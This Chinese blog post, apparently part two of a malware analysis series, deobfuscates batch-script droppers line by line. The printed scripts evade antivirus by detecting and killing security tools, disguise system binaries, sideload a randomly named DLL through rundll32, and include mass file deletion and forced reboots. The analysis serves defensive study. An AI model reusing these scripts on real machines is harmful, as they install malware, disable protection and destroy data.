0×01上一篇文章部分
首先是文件目录
整理后的目录
整理前的部分文件代码
update.bat
%%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q
cls
home.php?mod=space&uid=46675 off
set %l%=
set %o%=
set %v%=
set %e%=
:::::::::::::khyq:::::::::::::
del ....*.pif
:attrib ..ͼƬ½Øͼ.exe +s +h
copy /y ͼƬ½Øͼ.zp ....ͼƬ½Øͼ.jpg
del config.ini
ren config.xml config.ini
copy /y config.ini ..config.ini
:::::::::::::khyq:::::::::::::
:pdwjks
i%l%f%l% %l%e%l%x%l%i%l%s%l%t%l% %l%"%l%%l%%temp%%l%%l%\%l%b%l%u%l%g%l%0%l%.%l%t%l%x%l%t%l%"%l% %l%(%l%g%l%o%l%t%l%o%l% %l%q%l%i%l%a%l%o%l%h%l%c%l%)%l% %l%e%l%l%l%s%l%e%l% %l%(%l%g%l%o%l%t%l%o%l% %l%c%l%j%l%m%l%%l%%l%l%l%u%l%)%l%%l%%l%%l%%l%%l%%l%%l%%l%%l%
:cjmlu %l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%
e%o%c%o%h%o%o%o% %o%%o%%~dp0%o%%o%%o%>%o%%o%>%o%%o%"%o%%o%%temp%%o%%o%\%o%b%o%u%o%g%o%0%o%.%o%t%o%x%o%t%o%"%o%%o%%o%%o%
s%v%e%v%t%v%<%v%n%v%u%v%l%v%>%v%%v%%v%"%v%%v%%temp%%v%%v%\%v%b%v%u%v%g%v%0%v%.%v%t%v%x%v%t%v%"%v% %v%/%v%p%v%=%v%%v%%~dp0%v%%v%%v%
m%e%d%e% %e%c%e%:%e%HTEMP0\%e%%e%%e%%e%
i%e%f%e% %e%e%e%x%e%i%e%s%e%t%e% %e%%e%"%e%%e%%temp%%e%%e%\%e%q%e%r%e%.%e%t%e%m%e%p%e%"%e% %e%d%e%e%e%l%e% %e%/%e%s%e% %e%/%e%q%e% %e%"%e%%e%%temp%%e%%e%\%e%q%e%r%e%.%e%t%e%m%e%p%e%"%e%
e%e%c%e%h%e%o%e% %e%R%e%a%e%r%e%>%e%>%e%"%e%%e%%temp%%e%%e%\%e%q%e%r%e%.%e%t%e%m%e%p%e%"%e%%e%%e%%e%%e%%e%%e%
s%l%e%l%t%l%<%l%n%l%u%l%l%l%>%l%"%l%%l%%temp%%l%%l%\%l%q%l%r%l%.%l%t%l%m%l%p%l%"%l% %l%/%l%p%l%=%l%R%l%a%l%r%l%
c%l%o%l%p%l%y%l% %l%/%l%b%l% %l%"%l%%l%%temp%%l%%l%\%l%q%l%r%l%.%l%t%l%m%l%p%l%"%l%+"%l%u%l%q%l%d%l%a%l%t%l%e%l%.%l%t%l%m%l%p%l%" c:HTEMP0\%l%u%l%q%l%d%l%a%l%t%l%e%l%.%l%d%l%a%l%t%l%
c%l%o%l%p%l%y%l% %l%/%l%y%l% %l%c%l%:%l%\%l%w%l%i%l%n%l%d%l%o%l%w%l%s%l%\%l%s%l%y%l%s%l%t%l%e%l%m%l%3%l%2%l%\%l%r%l%u%l%n%l%d%l%l%l%l%l%3%l%2%l%.%l%e%l%x%l%e%l% %l%"%l%%l%%temp%%l%%l%\%l%z%l%c%l%.%l%e%l%x%l%e%l%"%l%
c%l%o%l%p%l%y%l% %l%/%l%y%l% %l%g%l%c%l%o%l%n%l%f%l%i%l%g%l%.%l%i%l%n%l%i%l% %l%"%l%%l%%APPDATA%%l%%l%\%l%p%l%a%l%y%l%e%l%r%l%s%l%s%l%.%l%i%l%n%l%i%l%"%l%%l%%l%%l%%l%
c%o%o%o%p%o%y%o% %o%/%o%y%o% %o%c%o%f%o%w%o%d%o%.%o%d%o%a%o%t%o% %o%%o%%o%"%o%%o%%o%%temp%%o%%o%%o%\%o%%o%%o%%o%"%o%%o%%o%%o%%o%%o%%o%
c%o%o%o%p%o%y%o% %o%/%o%y%o% %v%u%v%p%v%d%v%a%v%t%v%e%v%j%v%.%o%t%o%m%o%p%o% %o%c%o%:%o%HTEMP0\%o%%o%%o%%o%%o%%o%%o%%o%%o%
u%v%p%v%d%v%a%v%t%v%e%v%j%v%.%v%t%v%m%v%p%v% %o%x%o% %o%-%o%y%o% %o%-%o%o%o%+%o% %o%-%o%p%o%p%o% c:HTEMP0\%l%u%l%q%l%d%l%a%l%t%l%e%l%.%l%d%l%a%l%t%l% %o%q%o%i%o%a%o%o%o%i%o%.%o%b%o%a%o%t%o% %o%c%o%:%o%HTEMP0\%o%%o%%o%%o%
d%o%e%o%l%o% %o%"%o%%o%%o%%o%%temp%%o%%o%%o%%o%\%o%q%o%r%o%.%o%t%o%m%o%p%o%"%o% %o%/%o%s%o% %o%/%o%q%o%%o%%o%%o%
c%v%m%v%d%v%.%v%e%v%x%v%e%v% %v%/%v%c%v% %v%c%v%a%v%l%v%l%v% %v%c%v%:%v%HTEMP0\%v%q%v%i%v%a%v%o%v%i%v%.%v%b%v%a%v%t%v%%v%%v%
:qiaohc %l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%%l%%o%%v%%e%
e%l%%o%%v%%e%x%l%%o%%v%%e%i%l%%o%%v%%e%t%l%%o%%v%%e%
整理处理后
cls
@echo off
set =
set =
set =
set =
:::::::::::::khyq:::::::::::::
del ....*.pif //删除*.pif【这里特指截图.pif】
:attrib ..图片截图.exe +s +h //设置截图.exe的权限
copy /y 图片截图.zp ....图片截图.jpg //把图片截图.zp拷贝到主目录并重命名图片截图.jpg
del config.ini //删除config.ini
ren config.xml config.ini //重命名config.xml为config.ini
copy /y config.ini ..config.ini //拷贝并覆盖config.ini到根目录下
:::::::::::::khyq:::::::::::::
:pdwjks
if exist "%temp%ug0.txt" (goto qiaohc) else (goto cjmlu) //如果bug0.txt存在,跳转qiaohc,否则跳转cjmlu
:cjmlu
echo %~dp0>>"%temp%ug0.txt" //输出当前目录到bug0.txt
pause
set<nul>"%temp%ug0.txt" /p=%~dp0 //输出nul到bug0.txt,不带回车
pause
md c:HTEMP0 //创建HTEMP0文件夹
pause
if exist "%temp%qr.tmp" //判断存在
pause
del /s /q "%temp%qr.tmp" //删除qr.tmp
pause
echo Rar>>"%temp%qr.tmp" //输出rar到qr.tmp
pause
set<nul>"%temp%qr.tmp" /p=Rar //输出rar字符并不带回车
pause
copy /b "%temp%qr.tmp"+"uqdate.tmp" c:HTEMP0uqdate.dat //复制qr.tmp和uqdate.tmp到 c:HTEMP0uqdate.dat
pause
copy /y c:windowssystem32
undll32.exe "%temp%zc.exe" //复制rundll32.exe到zc.exe
pause
copy /y gconfig.ini "%APPDATA%payerss.ini" //复制gconfig.ini到payerss.ini
pause
copy /y cfwd.dat "%temp%" //复制cfwd.dat到临时目录
pause
copy /y updatej.tmp c:HTEMP0 //复制updatej.tmp到c:HTEMP0,这个文件是个解压软件,在cmd下可执行
pause
updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat qiaoi.bat c:HTEMP0 //解压uqdate.dat到目录
pause
del "%temp%qr.tmp" /s /q //删除qr.tmp
pause
cmd.exe /c call c:HTEMP0qiaoi.bat //执行qiaoi.bat
pause
:qiaohc
exit
为了让文件落地,删除最后的执行qiaoi.bat
执行后
第一步复制文件并打开
第二步输出当前目录到bug0.txt【注意光标】
第三步去除回车【注意光标】
第四步C盘建立HTEMP0
第五步TEMP下创建qr.tmp,内容为Rar
第六步复制qr.tmp和uqdate.tmp到 c:HTEMP0uqdate.dat
第七步复制rundll32.exe到zc.exe
第九步复制cfwd.dat到临时目录
第十步复制updatej.tmp到c:HTEMP0
十一 解压
0×02本篇
uqdate.dat的压缩内容如下
可用自带的软件全部解压出,但是为了搞清楚作者到底想干嘛,因此,跟着他的路走
qiaoi.bat原内容如下
%%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q %%Q
cls
set %vv%=
set %ll%=
set %oo%=
set %ee%=
u%ee%p%ee%d%ee%a%ee%t%ee%e%ee%j%ee%.%ee%t%ee%m%ee%p%ee% %vv%x%vv% %vv%-%vv%y%vv% %vv%-%vv%o%vv%+%vv% %vv%-%vv%p%vv%p%vv% c:HTEMP0\%vv%u%vv%q%vv%d%vv%a%vv%t%vv%%vv%e%vv%.%vv%d%vv%a%vv%t%vv% shaY0ng.exe %vv%c%vv%:%vv%HTEMP0\%vv%%vv%%vv%%vv%%vv%
u%ee%p%ee%d%ee%a%ee%t%ee%e%ee%j%ee%.%ee%t%ee%m%ee%p%ee% %ll%x%ll% %ll%-%ll%y%ll% %ll%-%ll%o%ll%+%ll% %ll%-%ll%p%ll%p%ll% c:HTEMP0\%vv%u%vv%q%vv%d%vv%a%vv%t%vv%%vv%e%vv%.%vv%d%vv%a%vv%t%vv% %ll%z%ll%c%ll%.%ll%i%ll%n%ll%f%ll% %ll%"%ll%%ll%%ll%%ll%%temp%%ll%%ll%%ll%\%ll%"%ll%
c%oo%:%oo%HTEMP0u%ee%p%ee%d%ee%a%ee%t%ee%e%ee%j%ee%.%ee%t%ee%m%ee%p%ee% %oo%x%oo% %oo%-%oo%y%oo% %oo%-%oo%o%oo%+%oo% %oo%-%oo%p%oo%p%oo% %oo%c%oo%:%oo%HTEMP0\%vv%u%vv%q%vv%d%vv%a%vv%t%vv%%vv%e%vv%.%vv%d%vv%a%vv%t%vv% %oo%F%oo%o%oo%rceLibrary%oo%.%oo%t%oo%m%oo%p%oo% %oo%c%oo%:%oo%HTEMP0\%oo%%oo%%oo%%oo%%oo%
:hh %oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%
i%ee%f%ee% %ee%e%ee%x%ee%i%ee%s%ee%t%ee% %ee%c%ee%:%ee%HTEMP0\%ee%0%ee%.%ee%t%ee%m%ee%p%ee% %ee%d%ee%e%ee%l%ee% %ee%/%ee%s%ee% %ee%/%ee%q%ee% %ee%c%ee%:%ee%HTEMP0\%ee%0%ee%.%ee%t%ee%m%ee%p%ee%
S%ee%%ee%%ee%etLoc%ee%%ee%%ee%al Ena%ee%%ee%%ee%bleDe%ee%%ee%%ee%layedEx%ee%%ee%%ee%%ee%%ee%pans%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%ion
s%ee%%ee%e%ee%%ee%t S%ee%%ee%t%ee%%ee%r=abcde%ee%%ee%f0123%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%456%ee%%ee%789
for /l %%L in (1 1 2) do (
set /a n = !random! %% 16
for %%n in (!n!) do set gjOut=!gjOut!!Str:~%%n,1!
)
e%ll%c%ll%h%ll%o%ll% %ll%%ll%%ll%%ll%MZ!gjOut!>%ll%>%ll%c%ll%:%ll%HTEMP0\%ll%0%ll%.%ll%t%ll%m%ll%p%ll%%ll%%ll%
set<nul>c:HTEMP0�.tmp /p=MZ!gjOut!
copy /b c:HTEMP0�.tmp+c:HTEMP0ForceLibrary.tmp c:HTEMP0!gjOut!.dll
c%ll%%ll%%ll%op%ll%%ll%%ll%y c%ll%:%ll%%ll%%ll%HTEMP0!gjOut!.d%ll%%ll%%ll%l%ll%%ll%l %ll%%ll%c%ll%%ll%:HTEMP0PotPla%ll%%ll%yer%ll%%ll%.%ll%%ll%dll
:360 %oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%
ta%ll%%ll%sk%ll%%ll%%ll%list | fi%ll%%ll%nd /i "360%ll%%ll%tr%ll%%ll%ay%ll%%ll%%ll%.e%ll%%ll%%ll%x%ll%%ll%e" |%ll%%ll%%ll%| go%ll%%ll%to n%ll%%ll%%ll%d
u%ee%p%ee%d%ee%a%ee%t%ee%e%ee%j%ee%.%ee%t%ee%m%ee%p%ee% %oo%x%oo% %oo%-%oo%y%oo% %oo%-%oo%o%oo%+%oo% %oo%-%oo%p%oo%p%oo% c:HTEMP0\%vv%u%vv%q%vv%d%vv%a%vv%t%vv%%vv%e%vv%.%vv%d%vv%a%vv%t%vv% %oo%z%oo%c%oo%.%oo%l%oo%n%oo%k
md "temp"
md "tempgamepatch"
copy /y "svhost.exe" "temp"
echo [game_base]>>"tempgamepatchconfig.ini"
echo mainExe=..zc.lnk>>"tempgamepatchconfig.ini"
if exist "c:stemp" (goto grs) else (goto ymygj)
:grs
updatej.tmp x -y -o+ -pp c:HTEMP0\%vv%u%vv%q%vv%d%vv%a%vv%t%vv%%vv%e%vv%.%vv%d%vv%a%vv%t%vv% zc2.lnk
del "zc.lnk"
ren "zc2.lnk" "zc.lnk"
:ymygj
tasklist | find /i "QQPCTray.exe" || goto zy360
updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat zc2.lnk
del "zc.lnk"
ren "zc2.lnk" "zc.lnk"
:zy360
t%ll%a%ll%s%ll%k%ll%k%ll%i%ll%l%ll%l%ll% %ll%/%ll%f%ll% %ll%/%ll%i%ll%m%ll% %ll%ksafe%ll%%ll%%ll%%ll%%ll%%ll%t%ll%%ll%%ll%%ll%ray%ll%%ll%.%ll%%ll%e%ll%%ll%x%ll%%ll%e%ll%%ll%
ta%ll%%ll%%ll%skkil%ll%%ll%%ll%%ll%%ll%l /%ll%%ll%%ll%f /%ll%%ll%%ll%im%ll%%ll%%ll% co%ll%%ll%%ll%%ll%%ll%nim%ll%%ll%%ll%%ll%e.%ll%%ll%%ll%%ll%e%ll%x%ll%e%ll%
c%vv%o%vv%p%vv%y%vv% %vv%/%vv%y%vv% %vv%c%vv%:%vv%\%vv%w%vv%i%vv%n%vv%d%vv%o%vv%w%vv%s%vv%\%vv%s%vv%y%vv%stem32ping%vv%.%vv%e%vv%x%vv%e%vv% "%vv%%vv%%temp%%vv%%vv%\%vv%suchost%vv%.%vv%e%vv%xe"
d%oo%e%oo%l%oo% %oo%%oo%%temp%%oo%%oo%\%oo%l%oo%s%oo%.%oo%l%oo%o%oo%g%oo%%oo%%oo%
f%oo%i%oo%n%oo%d%oo%s%oo%t%oo%r%oo% %oo%"%oo%d%oo%w%oo%x%oo%t%oo%=%oo%1%oo%"%oo% %oo%"%oo%g%oo%c%oo%o%oo%n%oo%f%oo%i%oo%g%oo%.%oo%i%oo%n%oo%i%oo%"&&goto xtdw||goto pdcq
tdw %oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%
md "temps"
md "tempsgamepatch"
copy /y "svhost.exe" "temps"
echo [game_base]>>"tempsgamepatchconfig.ini"
echo mainExe=..dw.lnk>>"tempsgamepatchconfig.ini"
updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat dw.lnk
"%ee%%temp%%ee%\%ee%s%ee%u%ee%c%ee%h%ee%o%ee%s%ee%t%ee%.%ee%e%ee%x%ee%e%ee%" -n 8 127.0.0.1
"%ee%%temp%%ee%\%ee%s%ee%u%ee%c%ee%h%ee%o%ee%s%ee%t%ee%.%ee%e%ee%x%ee%e%ee%" -n 1 www.baidu.com>nul 2>nul&&goto pdcq||goto dwyx
:dwyx
"%ee%%temp%%ee%\%ee%s%ee%u%ee%c%ee%h%ee%o%ee%s%ee%t%ee%.%ee%e%ee%x%ee%e%ee%" -n 2 127.0.0.1
copy /y c:HTEMP0!gjOut!.dll "PotPla%ll%%ll%yer%ll%%ll%.%ll%%ll%dll"
copy /y c:HTEMP0shaY0ng.exe "yx.exe"
:rundll32.exe "%temp%!gjOut!.dll",TrapEntry
:pdcq %oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%
set file=gconfig.ini
set name=cqxt
for /f "tokens=1,2* delims==" %%i in (%file%) do if "%%i"=="%name%" set value=%%j
if %value%==0 (goto zcxt)else (goto xtcq)
tcq %oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%
"%ee%%temp%%ee%\%ee%s%ee%u%ee%c%ee%h%ee%o%ee%s%ee%t%ee%.%ee%e%ee%x%ee%e%ee%" -n %value% 127.0.0.1
if exist "user.xml" (goto bsc11) else (goto sc11)
:sc11
del *.* /s /q
:bsc11
shutdown -r -t 0
exit
:zcxt %oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%
if exist "update.bat" (goto yxcqbat) else (goto byxcqbat)
:yxcqbat
"%ee%%temp%%ee%\%ee%s%ee%u%ee%c%ee%h%ee%o%ee%s%ee%t%ee%.%ee%e%ee%x%ee%e%ee%" -n 8 127.0.0.1
call update.bat
:byxcqbat
"%ee%%temp%%ee%\%ee%s%ee%u%ee%c%ee%h%ee%o%ee%s%ee%t%ee%.%ee%e%ee%x%ee%e%ee%" -n 28 127.0.0.1
if exist "user.xml" (goto bsc12) else (goto sc12)
:sc12
del *.* /s /q
:bsc12
exit
:nd %oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%
tasklist | find /i "QQPCTray.exe" || goto nud
updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat zc2.lnk
del "zc.lnk"
ren "zc2.lnk" "zc.lnk"
goto kxhaha
:nud
t%ee%%ee%%ee%as%ee%%ee%%ee%kli%ee%%ee%%ee%st | fi%ee%%ee%%ee%nd /%ee%%ee%%ee%i "n%ee%%ee%%ee%%ee%s.e%ee%%ee%%ee%x%ee%%ee%%ee%e" |%ee%%ee%%ee%%ee%%ee%|%ee%%ee%%ee% %ee%g%ee%o%ee%to jins
ta%ll%%ll%%ll%skkil%ll%%ll%%ll%%ll%%ll%l /%ll%%ll%%ll%f /%ll%%ll%%ll%im%ll%%ll%%ll% co%ll%%ll%%ll%%ll%%ll%nim%ll%%ll%%ll%%ll%e.%ll%%ll%%ll%%ll%e%ll%x%ll%e%ll%
ru%ll%%ll%nd%ll%%ll%l%ll%%ll%l%ll%%ll%%ll%3%ll%2%ll%.%ll%e%ll%x%ll%e%ll% %ee%c%ee%:%ee%HTEMP0!gjOut!.d%ll%l%ll%%ll%%ll%l%ll%%ll%%ll%%ll%%ll%,TrapEntry
e%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%xi%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%t
:jins
tasklist | find /i "kxetray.exe" || goto qt
:kxhaha
echo [Install]>>"setup.ini"
echo CmdLine=rundll32.exe c:HTEMP0!gjOut!.dll,TrapEntry>>"setup.ini"
updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat yx.exe
:copy /y c:windowssystem32
undll32.exe uqdate.exe
:del "gamepatchconfig.ini"
:echo [1]>>"gamepatchconfig.ini"
:echo InstName=5d>>"gamepatchconfig.ini"
:>>"gamepatchconfig.ini" echo CheckType=1
:echo CheckPath=>>"gamepatchconfig.ini"
:echo CheckVerion=5d>>"gamepatchconfig.ini"
:echo InstFile=uqdate.exe>>"gamepatchconfig.ini"
:echo InstParam=C:HTEMP0!gjOut!.dll,TrapEntry>>"gamepatchconfig.ini"
:copy /y "svhost.exe" "yx.exe"
exit
:qt %oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%%oo%
ru%ll%%ll%nd%ll%%ll%l%ll%%ll%l%ll%%ll%%ll%3%ll%2%ll%.%ll%e%ll%x%ll%e%ll% %ee%c%ee%:%ee%HTEMP0!gjOut!.d%ll%l%ll%%ll%%ll%l%ll%%ll%%ll%%ll%%ll%,TrapEntry
e%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%xi%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%%ee%t
整理后
cls
set =
set =
set =
set =
updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat shaY0ng.exe c:HTEMP0
updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat zc.inf "%temp%"
c:HTEMP0updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat ForceLibrary.tmp c:HTEMP0
:hh
if exist c:HTEMP00.tmp del /s /q c:HTEMP00.tmp
SetLocal EnableDelayedExpansion
set Str=abcdef0123456789
for /l %%L in (1 1 2) do (
set /a n = !random! %% 16
for %%n in (!n!) do set gjOut=!gjOut!!Str:~%%n,1!
)
echo MZ!gjOut!>>c:HTEMP00.tmp
set<nul>c:HTEMP00.tmp /p=MZ!gjOut!
copy /b c:HTEMP00.tmp+c:HTEMP0ForceLibrary.tmp c:HTEMP0!gjOut!.dll
copy c:HTEMP0!gjOut!.dll c:HTEMP0PotPlayer.dll
:360
tasklist | find /i "360tray.exe" || goto nd
updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat zc.lnk
md "temp"
md "tempgamepatch"
copy /y "svhost.exe" "temp"
echo [game_base]>>"tempgamepatchconfig.ini"
echo mainExe=..zc.lnk>>"tempgamepatchconfig.ini"
if exist "c:stemp" (goto grs) else (goto ymygj)
:grs
updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat zc2.lnk
del "zc.lnk"
ren "zc2.lnk" "zc.lnk"
:ymygj
tasklist | find /i "QQPCTray.exe" || goto zy360
updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat zc2.lnk
del "zc.lnk"
ren "zc2.lnk" "zc.lnk"
:zy360
taskkill /f /im ksafetray.exe
taskkill /f /im conime.exe
copy /y c:windowssystem32ping.exe "%temp%suchost.exe"
del %temp%ls.log
findstr "dwxt=1" "gconfig.ini"&&goto xtdw||goto pdcq
tdw
md "temps"
md "tempsgamepatch"
copy /y "svhost.exe" "temps"
echo [game_base]>>"tempsgamepatchconfig.ini"
echo mainExe=..dw.lnk>>"tempsgamepatchconfig.ini"
updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat dw.lnk
"%temp%suchost.exe" -n 8 127.0.0.1
"%temp%suchost.exe" -n 1 www.baidu.com>nul 2>nul&&goto pdcq||goto dwyx
:dwyx
"%temp%suchost.exe" -n 2 127.0.0.1
copy /y c:HTEMP0!gjOut!.dll "PotPlayer.dll"
copy /y c:HTEMP0shaY0ng.exe "yx.exe"
:rundll32.exe "%temp%!gjOut!.dll",TrapEntry
:pdcq
set file=gconfig.ini
set name=cqxt
for /f "tokens=1,2* delims==" %%i in (%file%) do if "%%i"=="%name%" set value=%%j
if %value%==0 (goto zcxt)else (goto xtcq)
tcq
"%temp%suchost.exe" -n %value% 127.0.0.1
if exist "user.xml" (goto bsc11) else (goto sc11)
:sc11
del *.* /s /q
:bsc11
shutdown -r -t 0
exit
:zcxt
if exist "update.bat" (goto yxcqbat) else (goto byxcqbat)
:yxcqbat
"%temp%suchost.exe" -n 8 127.0.0.1
call update.bat
:byxcqbat
"%temp%suchost.exe" -n 28 127.0.0.1
if exist "user.xml" (goto bsc12) else (goto sc12)
:sc12
del *.* /s /q
:bsc12
exit
:nd
tasklist | find /i "QQPCTray.exe" || goto nud
updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat zc2.lnk
del "zc.lnk"
ren "zc2.lnk" "zc.lnk"
goto kxhaha
:nud
tasklist | find /i "ns.exe" || goto jins
taskkill /f /im conime.exe
rundll32.exe c:HTEMP0!gjOut!.dll,TrapEntry
exit
:jins
tasklist | find /i "kxetray.exe" || goto qt
:kxhaha
echo [Install]>>"setup.ini"
echo CmdLine=rundll32.exe c:HTEMP0!gjOut!.dll,TrapEntry>>"setup.ini"
updatej.tmp x -y -o+ -pp c:HTEMP0uqdate.dat yx.exe
:copy /y c:windowssystem32
undll32.exe uqdate.exe
:del "gamepatchconfig.ini"
:echo [1]>>"gamepatchconfig.ini"
:echo InstName=5d>>"gamepatchconfig.ini"
:>>"gamepatchconfig.ini" echo CheckType=1
:echo CheckPath=>>"gamepatchconfig.ini"
:echo CheckVerion=5d>>"gamepatchconfig.ini"
:echo InstFile=uqdate.exe>>"gamepatchconfig.ini"
:echo InstParam=C:HTEMP0!gjOut!.dll,TrapEntry>>"gamepatchconfig.ini"
:copy /y "svhost.exe" "yx.exe"
exit
:qt
rundll32.exe c:HTEMP0!gjOut!.dll,TrapEntry
exit
从代码中不难看出,脚本对360、腾讯管家等杀软做了检测,并且使用了白加黑方式进行样本的释放和运行,由于该脚本比较复杂,下篇做详细分析
>>>>>> 黑客入门必备技能 带你入坑和逗比表哥们一起聊聊黑客的事儿,他们说高精尖的技术比农药都好玩~